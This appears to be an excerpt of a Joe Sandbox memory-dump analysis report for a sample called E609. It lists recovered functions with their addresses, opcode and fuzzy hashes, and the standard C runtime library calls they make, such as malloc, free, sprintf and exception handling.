Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
Instruction ID: 9b03e69b085882790a44db8b5e2764bfe6fe70391d8f6a30d64c454dc16f4cd8
Opcode Fuzzy Hash: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
Instruction Fuzzy Hash: 83025C715187058FC756EE0CD49035AF3E1FFC8305F19892DDA8987B64E73AA9198F82

Function 04A189D0 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
Instruction ID: 2d9473547b0795ef380de3f5893b0a9344097383df0c54b2778ee04da1df007b
Opcode Fuzzy Hash: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
Instruction Fuzzy Hash: 00C12833E2477906D764DEAF8C500AAB6E3AFC4220F9B477DDDD4A7242C9306D4A86C0

Function 04A1B0B0 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
Instruction ID: dab2fe87f4825cf01bdd4adeb0d852f5b99912dc3857324f0b7138209cbe3834
Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
Instruction Fuzzy Hash: F6A1DB0A8090E4ABEF455A7E90B63EBAFE9CB27354E76719284D85B793C019120FDF50

Function 04A130F0 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
Opcode Fuzzy Hash: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680

Function 04A1CA10 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction ID: c60f6cb48c7dd5bc59ddef04d5ac20d055d3d0ec9fcb6519d06faad286d4a4af
Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction Fuzzy Hash: CEC18CB5E003599FCB54CFA9C881ADEFBF1FF48310F24856AE919E7201E334AA558B54

Function 04A15DE7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
Instruction ID: 0762237f7efd1ddad5ae23a19de0831cb515b10da50b3a3f4b9c9e77ea4d5184
Opcode Fuzzy Hash: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
Instruction Fuzzy Hash: 40B183A0039FA686CBD3FF30911024BF7E0BFC525DF44194AD99986864EB3EE94E9215

Function 04A17520 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
Instruction ID: 6821477f55c0f325375790ead95a5d75a25d1200e89a514167b1ebb1b20fed95
Opcode Fuzzy Hash: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
Instruction Fuzzy Hash: 52912673D187BA06D7609EAF8C441B9B7E3AFC4210F9B0776DD9467242C9309E0697D0

Function 04A1C760 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
Instruction ID: e5e21642867f468ccfdba826a7d05696e40c1ad1a6ad3932163f7ea5d19501f1
Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
Instruction Fuzzy Hash: 14B16AB5E002599FCB84CFE9C885ADEFBF0FF48210F64816AD919E7301E334AA558B54

Function 04A1A916 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
Instruction ID: b66e5351253be1ffcc35b13d79f45390111f3e961fd0614f6cf9631e3e56ba33
Opcode Fuzzy Hash: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
Instruction Fuzzy Hash: 3B71D473A20B254B8314DEB98D94192F2F1EF84610B57C27CCE85D7B41EB31B95A96C0

Function 04A159F7 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
Instruction ID: b4a55a4e60e331f7f5dabcc845cfac8e9a9aeac6136a2c10ea1388790a9d9966
Opcode Fuzzy Hash: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
Instruction Fuzzy Hash: BE8127B2A047019FC328CF19D88566AF7E1FFD8210F15892EE99E93B41D770F8558B92

Function 04A18E60 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
Instruction ID: fb859924f281b99322f54b0fa5874f3909d4c25cab8a94c16667c08c0920fee1
Opcode Fuzzy Hash: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
Instruction Fuzzy Hash: A1710722535B7A06EBC3DA3D885046BF7D0BE4910AB850956DCD0F3181D72EDE4D77A4

Function 04A1A699 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
Instruction ID: 505a55dc1df81b9a9041984826ff391d7b40468a5ae7480a4b7a3e9eebefe506
Opcode Fuzzy Hash: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
Instruction Fuzzy Hash: C58147B5A10B669BD754CF2AD8C046AFBF1FB08310B518A2ADCA583B40D334F565DFA4

Function 04A19120 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
Instruction ID: 29b2ce016fdd671b7e9db193a7f4a5029bc30ce4e5dbb8eaa6837fd0d503f3fb
Opcode Fuzzy Hash: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
Instruction Fuzzy Hash: 3161A3739046BB5BDB649E6DD8401A9B7A2BFC4310F5B8A75DC9823642C234EA11DBD0

Function 04A17A80 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
Instruction ID: af19a77745d47d7486bfeadb3c1b16515f27130f9d90c1fac9738ec3eea75bca
Opcode Fuzzy Hash: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
Instruction Fuzzy Hash: 4D617C3791262B9BD761DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119BC4

Function 04A17880 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
Instruction ID: eaee83498a6cba454e25e4befdfd406fc3df78406aa435fb784600f297be98a0
Opcode Fuzzy Hash: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
Instruction Fuzzy Hash: CD51DD229257B945EBC3DA3D88504AEBBE0BE49206B460557DCD0B3181C72EDE4DB7E4

Function 04A17220 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
Instruction ID: f0ef39fb87bbcbabf7c087ccc32622f448b38fccad3fa450d398332d7bff4148
Opcode Fuzzy Hash: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
Instruction Fuzzy Hash: C4417C72E1872E47E34CFE169C9421AB39397C0250F4A8B3CCE5A973C1DA35B926C6C1

Function 0497771C Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029088899.0000000004976000.00000040.00000020.00020000.00000000.sdmp, Offset: 04976000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4976000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction ID: cedd3eb0359b9ffdbdb49bf5be3280827c2a5792ea355c8e3559aa6e4d7868d1
Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction Fuzzy Hash: 10314935906246DFCB15CFB4D8D1AB5BB71EF87324F1989EDD4818B106D3257046C794

Function 04A170E0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82

Function 04A17393 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
Instruction ID: c6d5a10cdefc3c7a1378a4f2a2f69ba8ee16acbb9efcbb2e81ff0f3183a3abc5
Opcode Fuzzy Hash: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
Instruction Fuzzy Hash: E53124346183419FD741EF29D980A4BFBE5FFC8258F41D929F9889B221D730E985CB62

Function 04A318D0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 48ab796a7bdbed55efb481c032341296661f288ceb3c0a0bfa3ed4f72222b51a
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: BB112B7724104243D6548B3EE8B45B7E3E5EBC632B72C437AF1924B75CF122F1459600

Function 04A1B000 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
Instruction ID: 85ff5ec1f43bfdec84ae46c36f4700ad08d91ce0d3aa908c75ad09ed8ba4cc49
Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
Instruction Fuzzy Hash: C9113D0A8492C4BDCF424A7840E56EBEFA58E2B218F4A71DA88C44B753D01B150FE7A1

Function 04A1A79A Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
Instruction ID: 5f066b75f11ccd076322ac746b501ebfdaad11089c4b8fa547082bb8e1628648
Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
Instruction Fuzzy Hash: 670128B69106629BD701DF3EC8C045AFBF1BB082217528B2ADC9083A41D334F662DBE4

Function 04A36437 Relevance: 18.1, APIs: 12, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__calloc_crt.LIBCMT ref: 04A3644E

Part of subcall function 04A39636: __calloc_impl.LIBCMT ref: 04A39645

__calloc_crt.LIBCMT ref: 04A36472
_free.LIBCMT ref: 04A36480
__calloc_crt.LIBCMT ref: 04A3648E
_free.LIBCMT ref: 04A3649E
_free.LIBCMT ref: 04A364A4
__copytlocinfo_nolock.LIBCMT ref: 04A364B3
__setmbcp_nolock.LIBCMT ref: 04A364D4
_free.LIBCMT ref: 04A364E2
___removelocaleref.LIBCMT ref: 04A364E9
___freetlocinfo.LIBCMT ref: 04A364F0
_free.LIBCMT ref: 04A364F6

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
String ID:
API String ID: 1442030790-0
Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction ID: 155f0589ac46af17b3f35b559fb248f8dde7b621661d4ea55a22f4561ae57131
Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction Fuzzy Hash: D021AE36A04600BEFB317F65DF01E4B7BE8DF4576BF608029F485550A0FB22B550CA50

Function 04A33F16 Relevance: 16.8, APIs: 11, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 04A33F51

Part of subcall function 04A35BA8: __getptd_noexit.LIBCMT ref: 04A35BA8

__gmtime64_s.LIBCMT ref: 04A33FEA
__gmtime64_s.LIBCMT ref: 04A34020
__gmtime64_s.LIBCMT ref: 04A3403D
__allrem.LIBCMT ref: 04A34093
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A340AF
__allrem.LIBCMT ref: 04A340C6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A340E4
__allrem.LIBCMT ref: 04A340FB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A34119
__invoke_watson.LIBCMT ref: 04A3418A

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: b59d098abf4006a858b08821cdd0042a364441f97719ce70e6fd69fc023b08c9
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: CD71F671A05B26ABE7149F79CD41B6AB3B8AF54369F148239F914DB6C0F770F9008790

Function 04A3650E Relevance: 16.6, APIs: 11, Instructions: 131
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__invoke_watson.LIBCMT ref: 04A36547
__calloc_crt.LIBCMT ref: 04A36598
__lock.LIBCMT ref: 04A365AE
__copytlocinfo_nolock.LIBCMT ref: 04A365BF
_wcscmp.LIBCMT ref: 04A365F9
__lock.LIBCMT ref: 04A36610
__updatetlocinfoEx_nolock.LIBCMT ref: 04A36622
___removelocaleref.LIBCMT ref: 04A36628
__updatetlocinfoEx_nolock.LIBCMT ref: 04A36647

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
String ID:
API String ID: 3432600739-0
Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction ID: 9674ecb36e242fc1e9e1426b2fe2138c97a479091116f98d0e4d3ca2e65d0ae1
Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction Fuzzy Hash: 0E412672904304BFEB20AFA4DE8079E7BF4AF4871AF10842DF91456190FB75B544DB15

Function 04A384AB Relevance: 16.6, APIs: 11, Instructions: 92
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 04A384B1
_free.LIBCMT ref: 04A384E2
_free.LIBCMT ref: 04A384F5
_free.LIBCMT ref: 04A38513
_free.LIBCMT ref: 04A38525
_free.LIBCMT ref: 04A38536
_free.LIBCMT ref: 04A38541
_free.LIBCMT ref: 04A38565
_free.LIBCMT ref: 04A38581
_free.LIBCMT ref: 04A38597
_free.LIBCMT ref: 04A385BF

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: _free$ExitProcess___crt
String ID:
API String ID: 1022109855-0
Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction ID: cdd68363b7492a3e815f9fc34f2fb23fc6e754e162ac012a0864c5488f1994ad
Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction Fuzzy Hash: 4A319332A01250DFDF21AF54FC8484977E4FB18326B04862EF905572B0EBB879C9AF94

Function 04A5FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 04A5FC1F

Part of subcall function 04A4169C: std::exception::_Copy_str.LIBCMT ref: 04A416B5

__CxxThrowException@8.LIBCMT ref: 04A5FC34
std::exception::exception.LIBCMT ref: 04A5FC4D
__CxxThrowException@8.LIBCMT ref: 04A5FC62
std::regex_error::regex_error.LIBCPMT ref: 04A5FC74

Part of subcall function 04A5F914: std::exception::exception.LIBCMT ref: 04A5F92E

__CxxThrowException@8.LIBCMT ref: 04A5FC82
std::exception::exception.LIBCMT ref: 04A5FC9B
__CxxThrowException@8.LIBCMT ref: 04A5FCB0

Strings

leM, xrefs: 04A5FCA8

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
String ID: leM
API String ID: 3569886845-2926266777
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: 86c47049f5493bd7612a2d0816ffa9981d5c4a342e4a7d497ea584d876d30613
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 4A11BC79C0020DBBCF00FFA5D559CDDBB7CAB44244F408566AD1897641EB74F7988B94

Function 04A1F010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 04A1F01F

Part of subcall function 04A31602: __FF_MSGBANNER.LIBCMT ref: 04A31619
Part of subcall function 04A31602: __NMSG_WRITE.LIBCMT ref: 04A31620

_malloc.LIBCMT ref: 04A1F02B
_wprintf.LIBCMT ref: 04A1F03E
_free.LIBCMT ref: 04A1F044
_free.LIBCMT ref: 04A1F065
_malloc.LIBCMT ref: 04A1F06D
_sprintf.LIBCMT ref: 04A1F0C0
_wprintf.LIBCMT ref: 04A1F0D2
_wprintf.LIBCMT ref: 04A1F0DC
_free.LIBCMT ref: 04A1F0E5

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$_sprintf
String ID:
API String ID: 3721157643-0
Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction ID: b2ae772d0e3a14ce9a93960d77121892220eae8460548c6ef8edd470bfe59b0f
Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction Fuzzy Hash: 1111E4B3A045A46AE261A7F55D11EFF7AEC9F49707F0801A9FB8DD1180FA187A0493B1

Function 04A21960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 04A219C6
__CxxThrowException@8.LIBCMT ref: 04A219F1
__CxxThrowException@8.LIBCMT ref: 04A21A1A
__CxxThrowException@8.LIBCMT ref: 04A21A4B
_memset.LIBCMT ref: 04A21A6A
__CxxThrowException@8.LIBCMT ref: 04A21A90
_malloc.LIBCMT ref: 04A21AA0
_memset.LIBCMT ref: 04A21AAB
_sprintf.LIBCMT ref: 04A21ACE

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset$_malloc_sprintf
String ID:
API String ID: 65388428-0
Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction ID: 80c9c38e70128adddfd98b830a363493d375aa91447397d126255a90fd21ff5a
Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction Fuzzy Hash: 42515871D40219BBEB10DBA5DD86FEFBBB8FB04744F100125F905B6180EB74AA018BA5

Function 04A1F210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 04A1F284
__CxxThrowException@8.LIBCMT ref: 04A1F2AF
__CxxThrowException@8.LIBCMT ref: 04A1F2DE
__CxxThrowException@8.LIBCMT ref: 04A1F30F
_memset.LIBCMT ref: 04A1F32E
__CxxThrowException@8.LIBCMT ref: 04A1F354
_sprintf.LIBCMT ref: 04A1F373

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction ID: ce3318e9461cf4edb9941b3f7a6bf312caaa507875401df38fcf12689da5bedb
Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction Fuzzy Hash: 50517EB1E40249AFEF11DFA1DD46FEEBBB8EB44704F100029F915B6190E775BA058BA4

Function 04A1F440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 04A1F4B7
__CxxThrowException@8.LIBCMT ref: 04A1F4E2
__CxxThrowException@8.LIBCMT ref: 04A1F504
__CxxThrowException@8.LIBCMT ref: 04A1F535
_memset.LIBCMT ref: 04A1F554
__CxxThrowException@8.LIBCMT ref: 04A1F57A
_sprintf.LIBCMT ref: 04A1F594

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

